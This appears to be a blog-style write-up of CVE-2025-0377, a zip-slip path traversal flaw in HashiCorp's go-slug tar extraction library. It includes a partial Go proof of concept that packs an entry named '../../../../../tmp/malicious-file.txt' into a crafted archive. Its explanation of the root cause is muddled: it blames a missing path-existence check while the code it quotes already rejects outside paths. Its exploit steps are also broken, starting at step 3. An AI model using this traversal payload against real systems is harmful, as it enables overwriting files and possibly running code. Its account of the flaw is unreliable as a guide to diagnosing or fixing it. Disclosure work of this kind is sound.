HashiCorp's go-slug library is an open-source utility used for creating and extracting "slugs" (compressed tar archive files) in Go applications. A critical vulnerability (CVE-2025-0377) has been discovered in the library that puts applications using it at risk for a zip-slip attack.
The vulnerability exists in the function that extracts a user-provided path from the tar entry during decompression. An attacker can exploit this vulnerability to manipulate the library into writing files outside the intended destination, possibly resulting in remote code execution (RCE) or data loss.
This post will outline the details of this vulnerability and describe how an attacker can exploit it. We will also provide code snippets to demonstrate the vulnerability and include links to original references for further information.
Vulnerability Details
The zip-slip vulnerability in go-slug occurs when the library extracts a user-provided path from a tar entry during decompression. If the user-supplied path does not exist, the library will incorrectly extract the tar entry outside the intended destination, potentially resulting in data loss or remote code execution.
The vulnerable function in the go-slug library is func createOrOpenFile, specifically when it processes the file paths from the tar entry. Here's the vulnerable code snippet from createOrOpenFile:
func (s *slug) createOrOpenFile(filePath string) (*os.File, error) {
...
if !strings.HasPrefix(cleanFileName, s.path) {
return nil, fmt.Errorf("file path outside of destination")
}
relPath := cleanFileName[len(s.path):]
outputPath := filepath.Join(s.outputPath, relPath)
...
}
Notice that the function checks whether the cleaned file name starts with the intended destination path (s.path). However, it doesn't validate whether the path exists, allowing a non-existent or malicious path to pass through.
Exploit Details
To exploit the vulnerability, an attacker needs to craft a malicious slug file containing a tar entry with a non-existent or specifically crafted path. Upon decompression, the go-slug library will write the file entry outside of the intended destination.
Submit the slug file to an application using the go-slug library for decompression.
3. The go-slug library writes the malicious file entry outside the intended destination during decompression.
Code Snippet Example
Here's an example demonstrating how an attacker can craft a malicious tar file with a non-existent path:
package main
import (
"archive/tar"
...
)
func main() {
maliciousPath := "../../../../../tmp/malicious-file.txt"
// Create a new tar file with the maliciousPath
tarFile, _ := os.Create("malicious-slug.tar")
tarWriter := tar.NewWriter(tarFile)
// Set the file header and write it to the tar
fileHeader := &tar.Header{
Name: maliciousPath,
...
}
tarWriter.WriteHeader(fileHeader)
tarWriter.Close()
...
}
For more information on this vulnerability and its mitigation, please see the following links
1. HashiCorp's official advisory: HashiCorp Security Advisory
2. Zip Slip Vulnerability details: ZIP Slip
3. NVD report on CVE-2025-0377: NIST Vulnerability Summary
Conclusion
CVE-2025-0377 is a critical vulnerability in HashiCorp's go-slug library, which exposes applications using it to a zip-slip attack when processing a non-existent user-provided path. Attackers can manipulate the decompression process to write files outside the intended destination, potentially resulting in data loss or remote code execution. Application developers should update their go-slug libraries to the latest version to mitigate this vulnerability and prevent exploitation.
Timeline
Published on: 01/21/2025 16:15:14 UTC